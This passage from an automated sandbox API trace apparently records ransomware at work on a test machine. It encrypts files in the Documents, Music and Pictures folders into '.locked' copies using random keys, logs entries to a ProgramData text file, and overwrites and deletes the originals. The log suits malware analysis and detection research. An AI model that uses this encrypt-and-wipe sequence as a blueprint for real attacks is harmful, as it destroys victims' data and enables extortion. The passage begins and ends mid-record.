WaitForSingleObject (hHandle=0x1f0, dwMilliseconds=0xffffffff) returned 0x0 [0308.465] SetEvent (hEvent=0x22c) returned 1 [0308.465] WaitForSingleObject (hHandle=0x1f0, dwMilliseconds=0xffffffff) returned 0x0 [0308.512] DeleteFileW (lpFileName="C:\\\\Users\\RDhJ0CNFevzX\\Documents\\ncy0WD.pptx" (normalized: "c:\\users\\rdhj0cnfevzx\\documents\\ncy0wd.pptx")) returned 1 [0308.563] WaitForSingleObject (hHandle=0x1f0, dwMilliseconds=0xffffffff) returned 0x0 [0308.753] WaitForSingleObject (hHandle=0x1f0, dwMilliseconds=0xffffffff) returned 0x0 [0308.754] WaitForSingleObject (hHandle=0x1f0, dwMilliseconds=0xffffffff) returned 0x0 [0308.770] SetEvent (hEvent=0x214) returned 1 [0308.770] WriteFile (in: hFile=0x1c0, lpBuffer=0x150e2000*, nNumberOfBytesToWrite=0xfa000, lpNumberOfBytesWritten=0x125dce78, lpOverlapped=0x0 | out: lpBuffer=0x150e2000*, lpNumberOfBytesWritten=0x125dce78*=0xfa000, lpOverlapped=0x0) returned 1 [0309.192] CloseHandle (hObject=0x1c0) returned 1 [0309.327] DeleteFileW (lpFileName="C:\\\\Users\\RDhJ0CNFevzX\\Music\\AnJCv.mp3" (normalized: "c:\\users\\rdhj0cnfevzx\\music\\anjcv.mp3")) returned 1 [0309.383] SetEvent (hEvent=0x1d0) returned 1 [0309.383] WaitForSingleObject (hHandle=0x1f0, dwMilliseconds=0xffffffff) returned 0x0 [0309.387] WaitForSingleObject (hHandle=0x1f0, dwMilliseconds=0xffffffff) returned 0x0 [0310.511] SetEvent (hEvent=0x1b8) returned 1 [0310.511] WaitForSingleObject (hHandle=0x1f0, dwMilliseconds=0xffffffff) returned 0x0 [0310.516] SetEvent (hEvent=0x21c) returned 1 [0310.516] SetEvent (hEvent=0x104) returned 1 [0310.516] WaitForSingleObject (hHandle=0x1f0, dwMilliseconds=0xffffffff) returned 0x0 [0310.559] WaitForSingleObject (hHandle=0x1f0, dwMilliseconds=0xffffffff) returned 0x0 [0310.564] CryptGenRandom (in: hProv=0x8e3e08, dwLen=0x20, pbBuffer=0x1263e000 | out: pbBuffer=0x1263e000) returned 1 [0310.565] CryptGenRandom (in: hProv=0x8e3e08, dwLen=0x10, pbBuffer=0x124a8010 | out: pbBuffer=0x124a8010) returned 1 [0310.565] CryptGenRandom (in: hProv=0x8e3e08, dwLen=0x20, pbBuffer=0x12702201 | out: pbBuffer=0x12702201) returned 1 [0310.565] WriteFile (in: hFile=0x230, lpBuffer=0x12573000*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x1239dd78, lpOverlapped=0x0 | out: lpBuffer=0x12573000*, lpNumberOfBytesWritten=0x1239dd78*=0x80, lpOverlapped=0x0) returned 1 [0310.607] WaitForSingleObject (hHandle=0x1f0, dwMilliseconds=0x1) returned 0x0 [0310.614] GetQueuedCompletionStatusEx (in: CompletionPort=0x174, lpCompletionPortEntries=0x33cefb30, ulCount=0x10, ulNumEntriesRemoved=0x33cefb10, dwMilliseconds=0x0, fAlertable=0 | out: lpCompletionPortEntries=0x33cefb30, ulNumEntriesRemoved=0x33cefb10) returned 0 [0310.615] SetEvent (hEvent=0x150) returned 1 [0310.615] SetEvent (hEvent=0x1d0) returned 1 [0310.615] SetEvent (hEvent=0x14c) returned 1 [0310.615] SetEvent (hEvent=0x104) returned 1 [0310.615] ReadFile (in: hFile=0x200, lpBuffer=0x13cf8000, nNumberOfBytesToRead=0x9c4000, lpNumberOfBytesRead=0x1239dd68, lpOverlapped=0x0 | out: lpBuffer=0x13cf8000*, lpNumberOfBytesRead=0x1239dd68*=0x994, lpOverlapped=0x0) returned 1 [0310.617] WriteFile (in: hFile=0x230, lpBuffer=0x12573000*, nNumberOfBytesToWrite=0x994, lpNumberOfBytesWritten=0x1239dd78, lpOverlapped=0x0 | out: lpBuffer=0x12573000*, lpNumberOfBytesWritten=0x1239dd78*=0x994, lpOverlapped=0x0) returned 1 [0310.628] WaitForSingleObject (hHandle=0x1f0, dwMilliseconds=0xffffffff) returned 0x0 [0310.694] ReadFile (in: hFile=0x200, lpBuffer=0x13cf8000, nNumberOfBytesToRead=0x9c4000, lpNumberOfBytesRead=0x1239dd68, lpOverlapped=0x0 | out: lpBuffer=0x13cf8000*, lpNumberOfBytesRead=0x1239dd68*=0x0, lpOverlapped=0x0) returned 1 [0310.694] CloseHandle (hObject=0x230) returned 1 [0310.732] WaitForSingleObject (hHandle=0x1f0, dwMilliseconds=0xffffffff) returned 0x0 [0310.779] CloseHandle (hObject=0x200) returned 1 [0310.779] CreateFileW (lpFileName="C:\\ProgramData\\keEeR.txt" (normalized: "c:\\programdata\\keeer.txt"), dwDesiredAccess=0x80000004, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x200 [0310.779] GetConsoleMode (in: hConsoleHandle=0x200, lpMode=0x1239de94 | out: lpMode=0x1239de94) returned 0 [0310.779] WriteFile (in: hFile=0x200, lpBuffer=0x127481e0*, nNumberOfBytesToWrite=0x94, lpNumberOfBytesWritten=0x1239de64, lpOverlapped=0x0 | out: lpBuffer=0x127481e0*, lpNumberOfBytesWritten=0x1239de64*=0x94, lpOverlapped=0x0) returned 1 [0310.780] CloseHandle (hObject=0x200) returned 1 [0310.780] DeleteFileW (lpFileName="C:\\\\Users\\RDhJ0CNFevzX\\Music\\Jbo1FZx\\KcRwHRb9GRYnTCwA\\Yjsf\\jvLuJscJOug\\ZvLJyDLOgo\\YibDx1iNotnzBWQf\\8GJ8o0z9Qy_3x90hPI8\\tTnyiBf8Er6HDgClHWhw.wav" (normalized: "c:\\users\\rdhj0cnfevzx\\music\\jbo1fzx\\kcrwhrb9gryntcwa\\yjsf\\jvlujscjoug\\zvljydlogo\\yibdx1inotnzbwqf\\8gj8o0z9qy_3x90hpi8\\ttnyibf8er6hdgclhwhw.wav")) returned 1 [0310.788] WaitForSingleObject (hHandle=0x1f0, dwMilliseconds=0xffffffff) returned 0x0 [0310.941] WaitForSingleObject (hHandle=0x1f0, dwMilliseconds=0xffffffff) returned 0x0 [0310.945] WaitForSingleObject (hHandle=0x1f0, dwMilliseconds=0xffffffff) returned 0x0 [0310.946] SetEvent (hEvent=0x1b8) returned 1 [0310.946] WaitForSingleObject (hHandle=0x1f0, dwMilliseconds=0xffffffff) returned 0x0 [0310.958] SetEvent (hEvent=0x184) returned 1 [0310.958] WaitForSingleObject (hHandle=0x1f0, dwMilliseconds=0xffffffff) returned 0x0 [0310.989] SetEvent (hEvent=0x1ac) returned 1 [0310.989] WaitForSingleObject (hHandle=0x1f0, dwMilliseconds=0xffffffff) returned 0x0 [0310.997] SetEvent (hEvent=0x20c) returned 1 [0310.997] WaitForSingleObject (hHandle=0x1f0, dwMilliseconds=0xffffffff) returned 0x0 [0311.067] SetEvent (hEvent=0x20c) returned 1 [0311.067] WaitForSingleObject (hHandle=0x1f0, dwMilliseconds=0xffffffff) returned 0x0 [0311.075] WriteFile (in: hFile=0x1bc, lpBuffer=0x13672000*, nNumberOfBytesToWrite=0xfa000, lpNumberOfBytesWritten=0x125d9e78, lpOverlapped=0x0 | out: lpBuffer=0x13672000*, lpNumberOfBytesWritten=0x125d9e78*=0xfa000, lpOverlapped=0x0) returned 1 [0311.100] CloseHandle (hObject=0x1bc) returned 1 [0311.101] DeleteFileW (lpFileName="C:\\\\Users\\RDhJ0CNFevzX\\Music\\Jbo1FZx\\KcRwHRb9GRYnTCwA\\Yjsf\\jvLuJscJOug\\ZvLJyDLOgo\\YibDx1iNotnzBWQf\\8GJ8o0z9Qy_3x90hPI8\\BoCtyz6FCZp97BdAlRa6.wav" (normalized: "c:\\users\\rdhj0cnfevzx\\music\\jbo1fzx\\kcrwhrb9gryntcwa\\yjsf\\jvlujscjoug\\zvljydlogo\\yibdx1inotnzbwqf\\8gj8o0z9qy_3x90hpi8\\boctyz6fczp97bdalra6.wav")) returned 1 [0311.107] WaitForSingleObject (hHandle=0x1f0, dwMilliseconds=0xffffffff) returned 0x0 [0312.199] WriteConsoleW (in: hConsoleOutput=0x3c, lpBuffer=0x125fc020*, nNumberOfCharsToWrite=0xc, lpNumberOfCharsWritten=0x12667a24, lpReserved=0x0 | out: lpBuffer=0x125fc020*, lpNumberOfCharsWritten=0x12667a24*=0xc) returned 1 [0312.402] WaitForSingleObject (hHandle=0x1f0, dwMilliseconds=0xffffffff) returned 0x0 [0312.429] CreateFileW (lpFileName="C:\\\\Users\\RDhJ0CNFevzX\\Pictures\\0ue1Rq8s_.bmp" (normalized: "c:\\users\\rdhj0cnfevzx\\pictures\\0ue1rq8s_.bmp"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1c8 [0312.430] GetConsoleMode (in: hConsoleHandle=0x1c8, lpMode=0x12667d9c | out: lpMode=0x12667d9c) returned 0 [0312.430] CreateFileW (lpFileName="C:\\\\Users\\RDhJ0CNFevzX\\Pictures\\0ue1Rq8s_.bmp.locked" (normalized: "c:\\users\\rdhj0cnfevzx\\pictures\\0ue1rq8s_.bmp.locked"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1bc [0312.431] GetConsoleMode (in: hConsoleHandle=0x1bc, lpMode=0x12667d9c | out: lpMode=0x12667d9c) returned 0 [0312.431] CryptGenRandom (in: hProv=0x8e3e08, dwLen=0x20, pbBuffer=0x125fc000 | out: pbBuffer=0x125fc000) returned 1 [0312.431] CryptGenRandom (in: hProv=0x8e3e08, dwLen=0x10, pbBuffer=0x124a8020 | out: pbBuffer=0x124a8020) returned 1 [0312.431] CryptGenRandom (in: hProv=0x8e3e08, dwLen=0x20, pbBuffer=0x12340281 | out: pbBuffer=0x12340281) returned 1 [0312.432] WriteFile (in: hFile=0x1bc, lpBuffer=0x12743000*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x12667d78, lpOverlapped=0x0 | out: lpBuffer=0x12743000*, lpNumberOfBytesWritten=0x12667d78*=0x80, lpOverlapped=0x0) returned 1 [0312.435] ReadFile (in: hFile=0x1c8, lpBuffer=0x12964000, nNumberOfBytesToRead=0x9c4000, lpNumberOfBytesRead=0x12667d68, lpOverlapped=0x0 | out: lpBuffer=0x12964000*, lpNumberOfBytesRead=0x12667d68*=0x14ffe, lpOverlapped=0x0) returned 1 [0312.440] WriteFile (in: hFile=0x1bc, lpBuffer=0x12964000*, nNumberOfBytesToWrite=0x14ffe, lpNumberOfBytesWritten=0x12667d74, lpOverlapped=0x0 | out: lpBuffer=0x12964000*, lpNumberOfBytesWritten=0x12667d74*=0x14ffe, lpOverlapped=0x0) returned 1 [0312.447] ReadFile (in: hFile=0x1c8, lpBuffer=0x12964000, nNumberOfBytesToRead=0x9c4000, lpNumberOfBytesRead=0x12667d68, lpOverlapped=0x0 | out: lpBuffer=0x12964000*, lpNumberOfBytesRead=0x12667d68*=0x0, lpOverlapped=0x0) returned 1 [0312.447] CloseHandle (hObject=0x1bc) returned 1 [0312.447] CloseHandle (hObject=0x1c8) returned 1 [0312.447] CreateFileW (lpFileName="C:\\ProgramData\\keEeR.txt" (normalized: "c:\\programdata\\keeer.txt"), dwDesiredAccess=0x80000004, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1c8 [0312.448] GetConsoleMode (in: hConsoleHandle=0x1c8, lpMode=0x12667e94 | out: lpMode=0x12667e94) returned 0 [0312.448] WriteFile (in: hFile=0x1c8, lpBuffer=0x12670140*, nNumberOfBytesToWrite=0x32, lpNumberOfBytesWritten=0x12667e64, lpOverlapped=0x0 | out: lpBuffer=0x12670140*, lpNumberOfBytesWritten=0x12667e64*=0x32, lpOverlapped=0x0) returned 1 [0312.448] CloseHandle (hObject=0x1c8) returned 1 [0312.448] DeleteFileW (lpFileName="C:\\\\Users\\RDhJ0CNFevzX\\Pictures\\0ue1Rq8s_.bmp" (normalized: "c:\\users\\rdhj0cnfevzx\\pictures\\0ue1rq8s_.bmp")) returned 1 [0312.486] WaitForSingleObject (hHandle=0x1f0, dwMilliseconds=0xffffffff) returned 0x0 [0312.547] SetEvent (hEvent=0x20c) returned 1 [0312.547] WaitForSingleObject (hHandle=0x1f0, dwMilliseconds=0xffffffff) returned 0x0 [0312.550] SetEvent (hEvent=0x22c) returned 1 [0312.550] WaitForSingleObject (hHandle=0x1f0, dwMilliseconds=0xffffffff) returned 0x0 [0312.552] SetEvent (hEvent=0x184) returned 1 [0312.552] WaitForSingleObject (hHandle=0x1f0, dwMilliseconds=0xffffffff) returned 0x0 [0312.621] CryptGenRandom (in: hProv=0x8e3e08, dwLen=0x20, pbBuffer=0x125fc020 | out: pbBuffer=0x125fc020) returned 1 [0312.621] CryptGenRandom (in: hProv=0x8e3e08, dwLen=0x10, pbBuffer=0x1234e020 | out: pbBuffer=0x1234e020) returned 1 [0312.621] CryptGenRandom (in: hProv=0x8e3e08, dwLen=0x20, pbBuffer=0x12340281 | out: pbBuffer=0x12340281) returned 1 [0312.622] WriteFile (in: hFile=0x1c0, lpBuffer=0x124a7000*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x1239fd78, lpOverlapped=0x0 | out: lpBuffer=0x124a7000*, lpNumberOfBytesWritten=0x1239fd78*=0x80, lpOverlapped=0x0) returned 1 [0312.625] WaitForSingleObject (hHandle=0x1f0, dwMilliseconds=0x1) returned 0x0 [0312.651] GetQueuedCompletionStatusEx (in: CompletionPort=0x174, lpCompletionPortEntries=0x33cefb30, ulCount=0x10, ulNumEntriesRemoved=0x33cefb10, dwMilliseconds=0x0, fAlertable=0 | out: lpCompletionPortEntries=0x33cefb30, ulNumEntriesRemoved=0x33cefb10) returned 0 [0312.651] SetEvent (hEvent=0x150) returned 1 [0312.651] SetEvent (hEvent=0x1e8) returned 1 [0312.651] SetEvent (hEvent=0x12c) returned 1 [0312.651] SetEvent (hEvent=0x220) returned 1 [0312.651] ReadFile (in: hFile=0x1e0, lpBuffer=0x15ddc000, nNumberOfBytesToRead=0x9c4000, lpNumberOfBytesRead=0x1239fd68, lpOverlapped=0x0 | out: lpBuffer=0x15ddc000*, lpNumberOfBytesRead=0x1239fd68*=0x117cb, lpOverlapped=0x0) returned 1 [0312.654] WriteFile (in: hFile=0x1c0, lpBuffer=0x15ddc000*, nNumberOfBytesToWrite=0x117cb, lpNumberOfBytesWritten=0x1239fd74, lpOverlapped=0x0 | out: lpBuffer=0x15ddc000*, lpNumberOfBytesWritten=0x1239fd74*=0x117cb, lpOverlapped=0x0) returned 1 [0312.690] WaitForSingleObject (hHandle=0x1f0, dwMilliseconds=0xffffffff) returned 0x0 [0312.720] SetEvent (hEvent=0x1e8) returned 1 [0312.720] ReadFile (in: hFile=0x1e0, lpBuffer=0x15ddc000, nNumberOfBytesToRead=0x9c4000, lpNumberOfBytesRead=0x1239fd68, lpOverlapped=0x0 | out: lpBuffer=0x15ddc000*, lpNumberOfBytesRead=0x1239fd68*=0x0, lpOverlapped=0x0) returned 1 [0312.720] WaitForSingleObject (hHandle=0x1f0, dwMilliseconds=0xffffffff) returned 0x0 [0312.854] SetEvent (hEvent=0x22c) returned 1 [0312.854] CloseHandle (hObject=0x1c0) returned 1 [0312.855] WaitForSingleObject (hHandle=0x1f0, dwMilliseconds=0xffffffff) returned 0x0 [0312.969] CloseHandle (hObject=0x1e0) returned 1 [0312.969] SetEvent (hEvent=0x184) returned 1 [0312.970] WaitForSingleObject (hHandle=0x1f0, dwMilliseconds=0xffffffff) returned 0x0 [0312.972] SetEvent (hEvent=0x22c) returned 1 [0312.972] WaitForSingleObject (hHandle=0x1f0, dwMilliseconds=0xffffffff) returned 0x0 [0312.976] SetEvent (hEvent=0x184) returned 1 [0312.976] WaitForSingleObject (hHandle=0x1f0, dwMilliseconds=0xffffffff) returned 0x0 [0312.993] SetEvent (hEvent=0x1b8) returned 1 [0312.993] WaitForSingleObject (hHandle=0x1f0, dwMilliseconds=0x1) returned 0x102 [0313.009] WaitForSingleObject (hHandle=0x1f0, dwMilliseconds=0xffffffff) returned 0x0 [0313.009] WaitForSingleObject (hHandle=0x1f0, dwMilliseconds=0x1) returned 0x102 [0313.011] WaitForSingleObject (hHandle=0x1f0, dwMilliseconds=0xffffffff) returned 0x0 [0313.011] SetEvent (hEvent=0x22c) returned 1 [0313.011] SetEvent (hEvent=0x20c) returned 1 [0313.011] SetEvent (hEvent=0x184) returned 1 [0313.011] WaitForSingleObject (hHandle=0x1f0, dwMilliseconds=0xffffffff) returned 0x0 [0313.018] GetQueuedCompletionStatusEx (in: CompletionPort=0x174, lpCompletionPortEntries=0x33cefb34, ulCount=0x10, ulNumEntriesRemoved=0x33cefb14, dwMilliseconds=0x0, fAlertable=0 | out: lpCompletionPortEntries=0x33cefb34, ulNumEntriesRemoved=0x33cefb14) returned 0 [0313.018] SetEvent (hEvent=0x150) returned 1 [0313.018] SetEvent (hEvent=0x184) returned 1 [0313.018] SetEvent (hEvent=0x20c) returned 1 [0313.018] CreateFileW (lpFileName="C:\\\\Users\\RDhJ0CNFevzX\\Pictures\\eDM5D-EmY4\\EL7ncsIzIojJ _a9Ks\\MgwF6NEdCmu8wRMced1\\bOgs768mC0sZS6u\\HhFJJPltLaMuNl.png" (normalized: "c:\\users\\rdhj0cnfevzx\\pictures\\edm5d-emy4\\el7ncsiziojj _a9ks\\mgwf6nedcmu8wrmced1\\bogs768mc0szs6u\\hhfjjpltlamunl.png"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x200 [0313.020] GetConsoleMode (in: hConsoleHandle=0x200, lpMode=0x123a3d9c | out: lpMode=0x123a3d9c) returned 0 [0313.020] CreateFileW (lpFileName="C:\\\\Users\\RDhJ0CNFevzX\\Pictures\\eDM5D-EmY4\\EL7ncsIzIojJ _a9Ks\\MgwF6NEdCmu8wRMced1\\bOgs768mC0sZS6u\\HhFJJPltLaMuNl.png.locked" (normalized: "c:\\users\\rdhj0cnfevzx\\pictures\\edm5d-emy4\\el7ncsiziojj _a9ks\\mgwf6nedcmu8wrmced1\\bogs768mc0szs6u\\hhfjjpltlamunl.png.locked"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x230 [0313.020] GetConsoleMode (in: hConsoleHandle=0x230, lpMode=0x123a3d9c | out: lpMode=0x123a3d9c) returned 0 [0313.021] CryptGenRandom (in: hProv=0x8e3e08, dwLen=0x20, pbBuffer=0x1234c200 | out: pbBuffer=0x1234c200) returned 1 [0313.021] CryptGenRandom (in: hProv=0x8e3e08, dwLen=0x10, pbBuffer=0x124a8040 | out: pbBuffer=0x124a8040) returned 1 [0313.021] CryptGenRandom (in: hProv=0x8e3e08, dwLen=0x20, pbBuffer=0x12702581 | out: pbBuffer=0x12702581) returned 1 [0313.021] WriteFile (in: hFile=0x230, lpBuffer=0x126a3000*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x123a3d78, lpOverlapped=0x0 | out: lpBuffer=0x126a3000*, lpNumberOfBytesWritten=0x123a3d78*=0x80, lpOverlapped=0x0) returned 1 [0313.024] WaitForSingleObject (hHandle=0x1f0, dwMilliseconds=0x1) returned 0x0 [0313.027] GetQueuedCompletionStatusEx (in: CompletionPort=0x174, lpCompletionPortEntries=0x33cefb30, ulCount=0x10, ulNumEntriesRemoved=0x33cefb10, dwMilliseconds=0x0, fAlertable=0 | out: lpCompletionPortEntries=0x33cefb30, ulNumEntriesRemoved=0x33cefb10) returned 0 [0313.027] SetEvent (hEvent=0x20c) returned 1 [0313.027] SetEvent (hEvent=0x184) returned 1 [0313.027] ReadFile (in: hFile=0x200, lpBuffer=0x12b78000, nNumberOfBytesToRead=0x9c4000, lpNumberOfBytesRead=0x123a3d68, lpOverlapped=0x0 | out: lpBuffer=0x12b78000*, lpNumberOfBytesRead=0x123a3d68*=0x18f14, lpOverlapped=0x0) returned 1 [0313.037] WriteFile (in: hFile=0x230, lpBuffer=0x12b78000*, nNumberOfBytesToWrite=0x18f14, lpNumberOfBytesWritten=0x123a3d74, lpOverlapped=0x0 | out: lpBuffer=0x12b78000*, lpNumberOfBytesWritten=0x123a3d74*=0x18f14, lpOverlapped=0x0) returned 1 [0313.041] WaitForSingleObject (hHandle=0x1f0, dwMilliseconds=0xffffffff) returned 0x0 [0313.057] SetEvent (hEvent=0x150) returned 1 [0313.057] ReadFile (in: hFile=0x200, lpBuffer=0x12b78000, nNumberOfBytesToRead=0x9c4000, lpNumberOfBytesRead=0x123a3d68, lpOverlapped=0x0 | out: lpBuffer=0x12b78000*, lpNumberOfBytesRead=0x123a3d68*=0x0, lpOverlapped=0x0) returned 1 [0313.057] WaitForSingleObject (hHandle=0x1f0, dwMilliseconds=0xffffffff) returned 0x0 [0313.168] SetEvent (hEvent=0x14c) returned 1 [0313.169] CloseHandle (hObject=0x230) returned 1 [0313.169] WaitForSingleObject (hHandle=0x1f0, dwMilliseconds=0xffffffff) returned 0x0 [0313.398] CloseHandle (hObject=0x200) returned 1 [0313.398] WaitForSingleObject (hHandle=0x1f0, dwMilliseconds=0xffffffff) returned 0x0 [0313.503] WaitForSingleObject (hHandle=0x1f0, dwMilliseconds=0xffffffff) returned 0x0 [0313.504] WaitForSingleObject (hHandle=0x1f0, dwMilliseconds=0xffffffff) returned 0x0 [0313.520] SetEvent (hEvent=0x184) returned 1 [0313.520] WaitForSingleObject (hHandle=0x1f0, dwMilliseconds=0xffffffff) returned 0x0 [0313.527] SetEvent (hEvent=0x220) returned 1 [0313.527] WaitForSingleObject (hHandle=0x1f0, dwMilliseconds=0xffffffff) returned 0x0 [0314.103] SetEvent (hEvent=0x22c) returned 1 [0314.103] CreateFileW (lpFileName="C:\\\\Users\\RDhJ0CNFevzX\\Pictures\\eDM5D-EmY4\\EL7ncsIzIojJ _a9Ks\\MgwF6NEdCmu8wRMced1\\cYwVCtVRJNlamU.bmp" (normalized: "c:\\users\\rdhj0cnfevzx\\pictures\\edm5d-emy4\\el7ncsiziojj _a9ks\\mgwf6nedcmu8wrmced1\\cywvctvrjnlamu.bmp"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x208 [0314.103] GetConsoleMode (in: hConsoleHandle=0x208, lpMode=0x125e7d9c | out: lpMode=0x125e7d9c) returned 0 [0314.103] CreateFileW (lpFileName="C:\\\\Users\\RDhJ0CNFevzX\\Pictures\\eDM5D-EmY4\\EL7ncsIzIojJ _a9Ks\\MgwF6NEdCmu8wRMced1\\cYwVCtVRJNlamU.bmp.locked" (normalized: "c:\\users\\rdhj0cnfevzx\\pictures\\edm5d-emy4\\el7ncsiziojj _a9ks\\mgwf6nedcmu8wrmced1\\cywvctvrjnlamu.bmp.locked"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x224 [0314.104] GetConsoleMode (in: hConsoleHandle=0x224, lpMode=0x125e7d9c | out: lpMode=0x125e7d9c) returned 0 [0314.104] CryptGenRandom (in: hProv=0x8e3e08, dwLen=0x20, pbBuffer=0x1234c340 | out: pbBuffer=0x1234c340) returned 1 [0314.104] CryptGenRandom (in: hProv=0x8e3e08, dwLen=0x10, pbBuffer=0x127660d0 | out: pbBuffer=0x127660d0) returned 1 [0314.104] CryptGenRandom (in: hProv=0x8e3e08, dwLen=0x20, pbBuffer=0x12340701 | out: pbBuffer=0x12340701) returned 1 [0314.104] WriteFile (in: hFile=0x224, lpBuffer=0x1264d000*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x125e7d78, lpOverlapped=0x0 | out: lpBuffer=0x1264d000*, lpNumberOfBytesWritten=0x125e7d78*=0x80, lpOverlapped=0x0) returned 1 [0314.107] ReadFile (in: hFile=0x208, lpBuffer=0x14ebc000, nNumberOfBytesToRead=0x9c4000, lpNumberOfBytesRead=0x125e7d68, lpOverlapped=0x0 | out: lpBuffer=0x14ebc000*, lpNumberOfBytesRead=0x125e7d68*=0x9908, lpOverlapped=0x0) returned 1 [0314.109] WriteFile (in: hFile=0x224, lpBuffer=0x14ebc000*, nNumberOfBytesToWrite=0x9908, lpNumberOfBytesWritten=0x125e7d74, lpOverlapped=0x0 | out: lpBuffer=0x14ebc000*, lpNumberOfBytesWritten=0x125e7d74*=0x9908, lpOverlapped=0x0) returned 1 [0314.112] WaitForSingleObject (hHandle=0x1f0, dwMilliseconds=0xffffffff) returned 0x0 [0314.156] ReadFile (in: hFile=0x208, lpBuffer=0x14ebc000, nNumberOfBytesToRead=0x9c4000, lpNumberOfBytesRead=0x125e7d68, lpOverlapped=0x0 | out: lpBuffer=0x14ebc000*, lpNumberOfBytesRead=0x125e7d68*=0x0, lpOverlapped=0x0) returned 1 [0314.156] CloseHandle (hObject=0x224) returned 1 [0314.156] CloseHandle (hObject=0x208) returned 1 [0314.156] CreateFileW (lpFileName="C:\\ProgramData\\keEeR.txt" (normalized: "c:\\programdata\\keeer.txt"), dwDesiredAccess=0x80000004, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x208 [0314.156] GetConsoleMode (in: hConsoleHandle=0x208, lpMode=0x125e7e94 | out: lpMode=0x125e7e94) returned 0 [0314.156] WriteFile (in: hFile=0x208, lpBuffer=0x126ee1c0*, nNumberOfBytesToWrite=0x69, lpNumberOfBytesWritten=0x125e7e64, lpOverlapped=0x0 | out: lpBuffer=0x126ee1c0*, lpNumberOfBytesWritten=0x125e7e64*=0x69, lpOverlapped=0x0) returned 1 [0314.156] CloseHandle (hObject=0x208) returned 1 [0314.157] DeleteFileW (lpFileName="C:\\\\Users\\RDhJ0CNFevzX\\Pictures\\eDM5D-EmY4\\EL7ncsIzIojJ _a9Ks\\MgwF6NEdCmu8wRMced1\\cYwVCtVRJNlamU.bmp" (normalized: "c:\\users\\rdhj0cnfevzx\\pictures\\edm5d-emy4\\el7ncsiziojj _a9ks\\mgwf6nedcmu8wrmced1\\cywvctvrjnlamu.bmp")) returned 1 [0314.212] CreateFileW (lpFileName="C:\\\\Users\\RDhJ0CNFevzX\\Pictures\\eDM5D-EmY4\\EL7ncsIzIojJ _a9Ks\\MgwF6NEdCmu8wRMced1\\cYwVCtVRJNlamU.bmp" (normalized: "c:\\users\\rdhj0cnfevzx\\pictures\\edm5d-emy4\\el7ncsiziojj _a9ks\\mgwf6nedcmu8wrmced1\\cywvctvrjnlamu.bmp"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1e0 [0314.419] WaitForSingleObject (hHandle=0x1f0, dwMilliseconds=0xffffffff) returned 0x0 [0314.552] GetConsoleMode (in: hConsoleHandle=0x1e0, lpMode=0x125e7e88 | out: lpMode=0x125e7e88) returned 0 [0314.552] WriteFile (in: hFile=0x1e0, lpBuffer=0x12a8c000*, nNumberOfBytesToWrite=0xfa000, lpNumberOfBytesWritten=0x125e7e78, lpOverlapped=0x0 | out: lpBuffer=0x12a8c000*, lpNumberOfBytesWritten=0x125e7e78*=0xfa000, lpOverlapped=0x0) returned 1 [0314.579] CloseHandle (hObject=0x1e0) returned 1 [0314.579] DeleteFileW (lpFileName="C:\\\\Users\\RDhJ0CNFevzX\\Pictures\\eDM5D-EmY4\\EL7ncsIzIojJ _a9Ks\\MgwF6NEdCmu8wRMced1\\cYwVCtVRJNlamU.bmp" (normalized: "c:\\users\\rdhj0cnfevzx\\pictures\\edm5d-emy4\\el7ncsiziojj _a9ks\\mgwf6nedcmu8wrmced1\\cywvctvrjnlamu.bmp")) returned 1 [0314.609] WriteConsoleW (in: hConsoleOutput=0x3c, lpBuffer=0x125fc000*, nNumberOfCharsToWrite=0xc, lpNumberOfCharsWritten=0x125e7a24, lpReserved=0x0 | out: lpBuffer=0x125fc000*, lpNumberOfCharsWritten=0x125e7a24*=0xc) returned 1 [0314.618] CreateFileW (lpFileName="C:\\\\Users\\RDhJ0CNFevzX\\Pictures\\eDM5D-EmY4\\EL7ncsIzIojJ _a9Ks\\tX9_ewqicQ_n-v\\UKjRjq2UGtPGf0Ar.jpg" (normalized: "c:\\users\\rdhj0cnfevzx\\pictures\\edm5d-emy4\\el7ncsiziojj _a9ks\\tx9_ewqicq_n-v\\ukjrjq2ugtpgf0ar.jpg"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x224 [0314.619] GetConsoleMode (in: hConsoleHandle=0x224, lpMode=0x125e7d9c | out: lpMode=0x125e7d9c) returned 0 [0314.619] CreateFileW (lpFileName="C:\\\\Users\\RDhJ0CNFevzX\\Pictures\\eDM5D-EmY4\\EL7ncsIzIojJ _a9Ks\\tX9_ewqicQ_n-v\\UKjRjq2UGtPGf0Ar.jpg.locked" (normalized: "c:\\users\\rdhj0cnfevzx\\pictures\\edm5d-emy4\\el7ncsiziojj 